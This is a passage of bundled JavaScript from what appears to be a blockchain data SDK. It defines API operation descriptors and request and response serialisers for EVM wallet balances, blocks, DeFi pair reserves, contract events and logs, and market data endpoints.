        "to_block",
        "limit",
        "contract_addresses",
        "exclude_contracts",
        "wallet_addresses",
        "exclude_wallets",
        "cursor"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $3dfc2d9370ba0cd1$export$405e9b1e4ed40d1b.fromJSON(json);
    },
    serializeRequest: function(request) {
        var chain = request.chain ? $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(request.chain) : undefined;
        var fromBlock = request.fromBlock;
        var toBlock = request.toBlock;
        var limit = request.limit;
        var contractAddresses = request.contractAddresses ? request.contractAddresses.map(function(item) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(item);
        }) : undefined;
        var excludeContracts = request.excludeContracts ? request.excludeContracts.map(function(item) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(item);
        }) : undefined;
        var walletAddresses = request.walletAddresses ? request.walletAddresses.map(function(item) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(item);
        }) : undefined;
        var excludeWallets = request.excludeWallets ? request.excludeWallets.map(function(item) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(item);
        }) : undefined;
        var cursor = request.cursor;
        return {
            chain: chain ? chain.toJSON() : undefined,
            from_block: fromBlock,
            to_block: toBlock,
            limit: limit,
            contract_addresses: contractAddresses ? contractAddresses.map(function(item) {
                return item.toJSON();
            }) : undefined,
            exclude_contracts: excludeContracts ? excludeContracts.map(function(item) {
                return item.toJSON();
            }) : undefined,
            wallet_addresses: walletAddresses ? walletAddresses.map(function(item) {
                return item.toJSON();
            }) : undefined,
            exclude_wallets: excludeWallets ? excludeWallets.map(function(item) {
                return item.toJSON();
            }) : undefined,
            cursor: cursor
        };
    }
};
var $3dfc2d9370ba0cd1$export$e086ed33a398f728 = {
    operationId: "web3ApiVersion",
    groupName: "utils",
    httpMethod: "get",
    routePattern: "/web3/version",
    parameterNames: [],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $3dfc2d9370ba0cd1$export$d0fcf1693976fcc1.fromJSON(json);
    },
    serializeRequest: function(request) {
        return {};
    }
};
var $3dfc2d9370ba0cd1$export$f39278a7bd17dc7e = {
    operationId: "endpointWeights",
    groupName: "utils",
    httpMethod: "get",
    routePattern: "/info/endpointWeights",
    parameterNames: [],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return json.map(function(item) {
            return $3dfc2d9370ba0cd1$export$7fc3ae096eab6610.fromJSON(item);
        });
    },
    serializeRequest: function(request) {
        return {};
    }
};
var $3dfc2d9370ba0cd1$export$5c6e8e3bad8fd01b = {
    operationId: "getTopERC20TokensByMarketCap",
    groupName: "marketData",
    httpMethod: "get",
    routePattern: "/market-data/erc20s/top-tokens",
    parameterNames: [],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return json.map(function(item) {
            return $3dfc2d9370ba0cd1$export$a68bc4978c05df0e.fromJSON(item);
        });
    },
    serializeRequest: function(request) {
        return {};
    }
};
var $3dfc2d9370ba0cd1$export$b8e287428f0083fb = {
    operationId: "getTopERC20TokensByPriceMovers",
    groupName: "marketData",
    httpMethod: "get",
    routePattern: "/market-data/erc20s/top-movers",
    parameterNames: [],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $3dfc2d9370ba0cd1$export$734e7dac14680bbb.fromJSON(json);
    },
    serializeRequest: function(request) {
        return {};
    }
};
var $3dfc2d9370ba0cd1$export$c30de6a407b87d63 = {
    operationId: "getTopNFTCollectionsByMarketCap",
    groupName: "marketData",
    httpMethod: "get",
    routePattern: "/market-data/nfts/top-collections",
    parameterNames: [],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return json.map(function(item) {
            return $3dfc2d9370ba0cd1$export$fc0a27605b96ed0d.fromJSON(item);
        });
    },
    serializeRequest: function(request) {
        return {};
    }
};
var $3dfc2d9370ba0cd1$export$3ebdbefa4796404e = {
    operationId: "getHottestNFTCollectionsByTradingVolume",
    groupName: "marketData",
    httpMethod: "get",
    routePattern: "/market-data/nfts/hottest-collections",
    parameterNames: [],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return json.map(function(item) {
            return $3dfc2d9370ba0cd1$export$42fec8dce66208c3.fromJSON(item);
        });
    },
    serializeRequest: function(request) {
        return {};
    }
};
var $3dfc2d9370ba0cd1$export$77bf45486adc529a = {
    operationId: "reviewContracts",
    groupName: "utils",
    httpMethod: "post",
    routePattern: "/contracts-review",
    parameterNames: [
        "chain"
    ],
    hasResponse: true,
    hasBody: true,
    parseResponse: function(json) {
        return $3dfc2d9370ba0cd1$export$c02aed079bd1558e.fromJSON(json);
    },
    serializeRequest: function(request) {
        var chain = request.chain ? $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(request.chain) : undefined;
        return {
            chain: chain ? chain.toJSON() : undefined
        };
    },
    serializeBody: function(body) {
        var value = $3dfc2d9370ba0cd1$export$b0273f0bf3517c7a.create(body);
        return value.toJSON();
    }
};
var $3dfc2d9370ba0cd1$export$1681f6a6f032ca89 = {
    operationId: "getWalletActiveChains",
    groupName: "wallets",
    httpMethod: "get",
    routePattern: "/wallets/{address}/chains",
    parameterNames: [
        "address",
        "chains"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $3dfc2d9370ba0cd1$export$f17875aee2d3a4af.fromJSON(json);
    },
    serializeRequest: function(request) {
        var address = $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address);
        var chains = request.chains ? request.chains.map(function(item) {
            return $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(item);
        }) : undefined;
        return {
            address: address.toJSON(),
            chains: chains ? chains.map(function(item) {
                return item.toJSON();
            }) : undefined
        };
    }
};
var $3dfc2d9370ba0cd1$export$59894c102379d64a = [
    $3dfc2d9370ba0cd1$export$b9e67fc8a4e7b76d,
    $3dfc2d9370ba0cd1$export$e128930172c10f7e,
    $3dfc2d9370ba0cd1$export$e086ed33a398f728,
    $3dfc2d9370ba0cd1$export$f39278a7bd17dc7e,
    $3dfc2d9370ba0cd1$export$5c6e8e3bad8fd01b,
    $3dfc2d9370ba0cd1$export$b8e287428f0083fb,
    $3dfc2d9370ba0cd1$export$c30de6a407b87d63,
    $3dfc2d9370ba0cd1$export$3ebdbefa4796404e,
    $3dfc2d9370ba0cd1$export$77bf45486adc529a,
    $3dfc2d9370ba0cd1$export$1681f6a6f032ca89
];
var $3dfc2d9370ba0cd1$export$bd3f6d261d8f2574 = {
    defaultEvmApiChain: {
        name: "defaultEvmApiChain",
        defaultValue: "0x1"
    }
};
var $3dfc2d9370ba0cd1$export$4c0bee321055ecb1 = /** @class */ function() {
    function CommonEvmUtilsConfigSetup() {}
    CommonEvmUtilsConfigSetup.register = function(config) {
        config.registerKey($3dfc2d9370ba0cd1$export$bd3f6d261d8f2574.defaultEvmApiChain);
    };
    return CommonEvmUtilsConfigSetup;
}();
var $3dfc2d9370ba0cd1$export$6f713f3b0df4d10f = /** @class */ function(_super) {
    $3dfc2d9370ba0cd1$var$__extends(CommonEvmUtils, _super);
    function CommonEvmUtils(core) {
        return _super.call(this, CommonEvmUtils.moduleName, core) || this;
    }
    CommonEvmUtils.create = function(core) {
        return new CommonEvmUtils(core !== null && core !== void 0 ? core : (0, $10891f2cb3e98601$export$211989d19e9f0ff7).getDefault());
    };
    CommonEvmUtils.prototype.setup = function() {
        $3dfc2d9370ba0cd1$export$4c0bee321055ecb1.register(this.core.config);
    };
    CommonEvmUtils.prototype.start = function() {
    // Nothing
    };
    Object.defineProperty(CommonEvmUtils.prototype, "EvmAddress", {
        get: function() {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(CommonEvmUtils.prototype, "EvmChain", {
        get: function() {
            return $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(CommonEvmUtils.prototype, "EvmNative", {
        get: function() {
            return $3dfc2d9370ba0cd1$export$62862bdd1f71aa78;
        },
        enumerable: false,
        configurable: true
    });
    CommonEvmUtils.moduleName = "evmUtils";
    return CommonEvmUtils;
}((0, $10891f2cb3e98601$export$c3a9d7ff17e4f3ed));
var $3dfc2d9370ba0cd1$export$f9c4238e05371bd3 = /** @class */ function() {
    function EvmChainResolver() {}
    EvmChainResolver.resolve = function(chain, core) {
        if (chain) return $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(chain);
        var defaultEvmChain = core.config.get($3dfc2d9370ba0cd1$export$bd3f6d261d8f2574.defaultEvmApiChain);
        return $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(defaultEvmChain);
    };
    return EvmChainResolver;
}();
/** Get the native balance for a specific wallet address. */ var $3dfc2d9370ba0cd1$export$a1e62a5f47027c1d = {
    method: "GET",
    name: "getNativeBalance",
    id: "getNativeBalance",
    groupName: "balance",
    urlPathPattern: "/{address}/balance",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain",
        "toBlock"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$M,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$M,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$M,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$M
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$M(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        to_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.toBlock, String),
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$M(jsonResponse) {
    return {
        balance: $3dfc2d9370ba0cd1$export$62862bdd1f71aa78.create(jsonResponse.balance, "wei")
    };
}
function $3dfc2d9370ba0cd1$var$serializeRequest$M(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        toBlock: request.toBlock,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$M(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        toBlock: jsonRequest.toBlock,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address)
    };
}
/** Get the native balances for a set of specific addresses */ var $3dfc2d9370ba0cd1$export$70045e42822758c2 = {
    method: "GET",
    name: "getNativeBalancesForAddresses",
    id: "getNativeBalancesForAddresses",
    groupName: "balance",
    urlPathPattern: "/wallets/balances",
    urlSearchParamNames: [
        "chain",
        "toBlock",
        "walletAddresses"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$L,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$L,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$L,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$L
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$L(request, core) {
    var _a;
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        to_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.toBlock, String),
        wallet_addresses: (_a = request.walletAddresses) === null || _a === void 0 ? void 0 : _a.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).checksum;
        })
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$L(jsonResponse, request, core) {
    return (jsonResponse !== null && jsonResponse !== void 0 ? jsonResponse : []).map(function(chainBalances) {
        return {
            chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
            blockNumber: chainBalances.block_number,
            blockTimestamp: chainBalances.block_timestamp,
            totalBalance: $3dfc2d9370ba0cd1$export$62862bdd1f71aa78.create(chainBalances.total_balance, "wei"),
            walletBalances: chainBalances.wallet_balances.map(function(walletBalance) {
                return {
                    address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(walletBalance.address),
                    balance: $3dfc2d9370ba0cd1$export$62862bdd1f71aa78.create(walletBalance.balance, "wei")
                };
            })
        };
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$L(request, core) {
    var _a;
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        toBlock: request.toBlock,
        walletAddresses: (_a = request.walletAddresses) === null || _a === void 0 ? void 0 : _a.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).checksum;
        })
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$L(jsonRequest, core) {
    var _a;
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(jsonRequest.chain, core),
        toBlock: jsonRequest.toBlock,
        walletAddresses: (_a = jsonRequest.walletAddresses) === null || _a === void 0 ? void 0 : _a.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
        })
    };
}
/** Get the contents of a block given the block hash. */ var $3dfc2d9370ba0cd1$export$62e0feeeee341a27 = {
    method: "GET",
    name: "getBlock",
    id: "getBlock",
    groupName: "block",
    isNullable: true,
    urlPathPattern: "/block/{blockNumberOrHash}",
    urlPathParamNames: [
        "blockNumberOrHash"
    ],
    urlSearchParamNames: [
        "chain",
        "include"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$K,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$K,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$K,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$K
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$K(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        blockNumberOrHash: request.blockNumberOrHash,
        include: request.include
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$K(jsonResponse, request, core) {
    var _a;
    var data = (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(jsonResponse);
    var chain = $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core);
    // TODO: account for changes in api, now we have unknown types for addresses
    // OR fix the types correctly in api
    // I noticed that the docs comes with a type of "string | unknown" which automatically resolves to "unknown". I think we should fix this in the api, casting for now
    return $3dfc2d9370ba0cd1$export$79fa1f4c2d188e01.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
        chain: chain,
        transactions: ((_a = data.transactions) !== null && _a !== void 0 ? _a : []).map(function(transaction) {
            var _a, _b;
            return $3dfc2d9370ba0cd1$export$1ecb3c5cbbcf4bef.create({
                cumulativeGasUsed: transaction.receiptCumulativeGasUsed,
                gasPrice: transaction.gasPrice,
                gasUsed: transaction.receiptGasUsed,
                index: transaction.transactionIndex,
                contractAddress: transaction.receiptContractAddress,
                receiptRoot: transaction.receiptRoot,
                receiptStatus: +transaction.receiptStatus,
                chain: chain,
                data: transaction.input,
                from: transaction.fromAddress,
                hash: transaction.hash,
                nonce: transaction.nonce,
                value: transaction.value,
                blockHash: transaction.blockHash,
                blockNumber: +transaction.blockNumber,
                blockTimestamp: new Date(transaction.blockTimestamp),
                gas: transaction.gas,
                to: transaction.toAddress,
                logs: ((_a = transaction.logs) !== null && _a !== void 0 ? _a : []).map(function(jsonLog) {
                    var log = (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(jsonLog);
                    return $3dfc2d9370ba0cd1$export$138ade50fb8052f5.create({
                        chain: chain,
                        address: log.address,
                        blockHash: log.blockHash,
                        blockNumber: +log.blockNumber,
                        data: log.data,
                        topics: [
                            log.topic0,
                            log.topic1,
                            log.topic2,
                            log.topic3
                        ],
                        transactionHash: log.transactionHash,
                        blockTimestamp: log.blockTimestamp,
                        logIndex: +log.logIndex,
                        transactionIndex: +log.transactionIndex
                    });
                }),
                internalTransactions: ((_b = transaction.internalTransactions) !== null && _b !== void 0 ? _b : []).map(function(jsonInternalTransaction) {
                    var internalTransaction = (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(jsonInternalTransaction);
                    return $3dfc2d9370ba0cd1$export$9a834303a812ec41.create($3dfc2d9370ba0cd1$var$__assign({
                        chain: chain
                    }, internalTransaction));
                })
            });
        })
    }));
}
function $3dfc2d9370ba0cd1$var$serializeRequest$K(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        blockNumberOrHash: request.blockNumberOrHash,
        include: request.include
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$K(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        blockNumberOrHash: jsonRequest.blockNumberOrHash,
        include: jsonRequest.include
    };
}
/** Get the closest block given the date. */ var $3dfc2d9370ba0cd1$export$21b0ec1fd3742c57 = {
    method: "GET",
    name: "getDateToBlock",
    id: "getDateToBlock",
    groupName: "block",
    urlPathPattern: "/dateToBlock",
    urlSearchParamNames: [
        "chain",
        "date"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$J,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$J,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$J,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$J
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$J(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        date: new Date(request.date).toISOString()
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$J(jsonResponse) {
    return $3dfc2d9370ba0cd1$export$c2bd742cd1af735d.create(jsonResponse);
}
function $3dfc2d9370ba0cd1$var$serializeRequest$J(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        date: new Date(request.date).toISOString()
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$J(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        date: new Date(jsonRequest.date)
    };
}
/**
 * Fetch the pair data of the provided token0+token1 combination.
 * The token0 and token1 options are interchangable (ie. there is no different outcome in "token0=WETH and token1=USDT" or "token0=USDT and token1=WETH")
 */ var $3dfc2d9370ba0cd1$export$d413e2c33fff25bf = {
    method: "GET",
    name: "getPairAddress",
    id: "getPairAddress",
    groupName: "defi",
    urlPathPattern: "/{token0Address}/{token1Address}/pairAddress",
    urlPathParamNames: [
        "token0Address",
        "token1Address"
    ],
    urlSearchParamNames: [
        "chain",
        "toBlock",
        "toDate",
        "exchange"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$I,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$I,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$I,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$I
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$I(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        to_block: request.toBlock,
        to_date: request.toDate ? new Date(request.toDate).toISOString() : undefined,
        exchange: request.exchange,
        token0Address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.token0Address).lowercase,
        token1Address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.token1Address).lowercase
    };
}
function $3dfc2d9370ba0cd1$var$createErc20Token(token, core, chain) {
    var _a, _b, _c;
    return $3dfc2d9370ba0cd1$export$28ff99e69b404cc.create({
        contractAddress: (token === null || token === void 0 ? void 0 : token.address) ? $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(token === null || token === void 0 ? void 0 : token.address) : "",
        decimals: (_a = token === null || token === void 0 ? void 0 : token.decimals) !== null && _a !== void 0 ? _a : 0,
        name: (_b = token === null || token === void 0 ? void 0 : token.name) !== null && _b !== void 0 ? _b : "",
        symbol: (_c = token === null || token === void 0 ? void 0 : token.symbol) !== null && _c !== void 0 ? _c : "",
        logo: token === null || token === void 0 ? void 0 : token.logo,
        thumbnail: token === null || token === void 0 ? void 0 : token.thumbnail,
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(chain, core)
    });
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$I(jsonResponse, request, core) {
    var _a, _b, _c, _d, _e, _f, _g, _h;
    return {
        //   ApiResult types generated all come as undefined which should not be the case TODO:
        token0: {
            token: $3dfc2d9370ba0cd1$var$createErc20Token(jsonResponse.token0, core, request.chain),
            blockNumber: (_a = jsonResponse.token0) === null || _a === void 0 ? void 0 : _a.block_number,
            validated: (_b = jsonResponse.token0) === null || _b === void 0 ? void 0 : _b.validated,
            createdAt: ((_c = jsonResponse.token0) === null || _c === void 0 ? void 0 : _c.created_at) ? new Date((_d = jsonResponse.token0) === null || _d === void 0 ? void 0 : _d.created_at) : undefined
        },
        token1: {
            token: $3dfc2d9370ba0cd1$var$createErc20Token(jsonResponse.token1, core, request.chain),
            blockNumber: (_e = jsonResponse.token1) === null || _e === void 0 ? void 0 : _e.block_number,
            validated: (_f = jsonResponse.token1) === null || _f === void 0 ? void 0 : _f.validated,
            createdAt: ((_g = jsonResponse.token1) === null || _g === void 0 ? void 0 : _g.created_at) ? new Date((_h = jsonResponse.token1) === null || _h === void 0 ? void 0 : _h.created_at) : undefined
        },
        pairAddress: jsonResponse.pairAddress ? $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonResponse.pairAddress) : undefined
    };
}
function $3dfc2d9370ba0cd1$var$serializeRequest$I(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        toBlock: request.toBlock,
        toDate: request.toDate ? new Date(request.toDate).toISOString() : undefined,
        exchange: request.exchange,
        token0Address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.token0Address).lowercase,
        token1Address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.token1Address).lowercase
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$I(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        toBlock: jsonRequest.toBlock,
        toDate: jsonRequest.toDate ? new Date(jsonRequest.toDate) : undefined,
        exchange: jsonRequest.exchange,
        token0Address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.token0Address),
        token1Address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.token1Address)
    };
}
/** Get the liquidity reserves for a given pair address. Only Uniswap V2 based exchanges supported at the moment. */ var $3dfc2d9370ba0cd1$export$eebe7b17fddf7123 = {
    method: "GET",
    name: "getPairReserves",
    id: "getPairReserves",
    groupName: "defi",
    urlPathPattern: "/{pairAddress}/reserves",
    urlPathParamNames: [
        "pairAddress"
    ],
    urlSearchParamNames: [
        "chain",
        "toBlock",
        "toDate"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$H,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$H,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$H,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$H
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$H(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        pairAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.pairAddress).lowercase,
        to_block: request.toBlock,
        to_date: request.toDate ? new Date(request.toDate).toISOString() : undefined
    };
}
function $3dfc2d9370ba0cd1$var$serializeRequest$H(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        toBlock: request.toBlock,
        toDate: request.toDate ? new Date(request.toDate).toISOString() : undefined,
        pairAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.pairAddress).lowercase
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$H(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        toBlock: jsonRequest.toBlock,
        toDate: jsonRequest.toDate ? new Date(jsonRequest.toDate) : undefined,
        pairAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.pairAddress)
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$H(jsonResponse) {
    return jsonResponse;
}
/** Get events for a contract ordered by block number in descending order. */ var $3dfc2d9370ba0cd1$export$6ec0913c942c04c3 = {
    method: "POST",
    name: "getContractEvents",
    id: "getContractEvents",
    groupName: "events",
    urlPathPattern: "/{address}/events",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain",
        "fromBlock",
        "toBlock",
        "fromDate",
        "toDate",
        "topic",
        "offset",
        "limit",
        "disableTotal"
    ],
    bodyParamNames: [
        "abi"
    ],
    bodyType: "raw",
    firstPageIndex: 0,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$G,
    getRequestBody: $3dfc2d9370ba0cd1$var$getRequestBody$3,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$G,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$G,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$G
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$G(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        from_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.fromBlock, String),
        to_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.toBlock, String),
        from_date: request.fromDate ? new Date(request.fromDate).toISOString() : undefined,
        to_date: request.toDate ? new Date(request.toDate).toISOString() : undefined,
        topic: request.topic,
        offset: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.offset, String),
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        disable_total: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$getRequestBody$3(request) {
    return request.abi;
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$G(jsonResponse, request, core) {
    var _a, _b;
    return (_b = (_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []) === null || _b === void 0 ? void 0 : _b.map(function(event) {
        return $3dfc2d9370ba0cd1$export$6273aab5ee1e73b8.create({
            chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
            address: request.address,
            blockHash: event.block_hash,
            blockNumber: event.block_number,
            blockTimestamp: event.block_timestamp,
            transactionHash: event.transaction_hash,
            data: {
                to: event.data.to,
                from: event.data.from,
                value: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(event.data.value, function(value) {
                    return $3dfc2d9370ba0cd1$export$62862bdd1f71aa78.create(value, "wei");
                })
            }
        });
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$G(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        fromBlock: request.fromBlock,
        toBlock: request.toBlock,
        fromDate: request.fromDate ? new Date(request.fromDate).toISOString() : undefined,
        toDate: request.toDate ? new Date(request.toDate).toISOString() : undefined,
        topic: request.topic,
        offset: request.offset,
        limit: request.limit,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        abi: request.abi,
        disableTotal: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$G(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        fromBlock: jsonRequest.fromBlock,
        toBlock: jsonRequest.toBlock,
        fromDate: jsonRequest.fromDate ? new Date(jsonRequest.fromDate) : undefined,
        toDate: jsonRequest.toDate ? new Date(jsonRequest.toDate) : undefined,
        topic: jsonRequest.topic,
        offset: jsonRequest.offset,
        limit: jsonRequest.limit,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address),
        abi: jsonRequest.abi,
        disableTotal: jsonRequest.disableTotal
    };
}
/** Get the logs for a contract. */ var $3dfc2d9370ba0cd1$export$1d9fd9956238b29 = {
    method: "GET",
    name: "getContractLogs",
    id: "getContractLogs",
    groupName: "events",
    urlPathPattern: "/{address}/logs",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain",
        "blockNumber",
        "fromBlock",
        "toBlock",
        "fromDate",
        "toDate",
        "topic0",
        "topic1",
        "topic2",
        "topic3",
        "limit",
        "cursor",
        "disableTotal"
    ],
    firstPageIndex: 0,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$F,
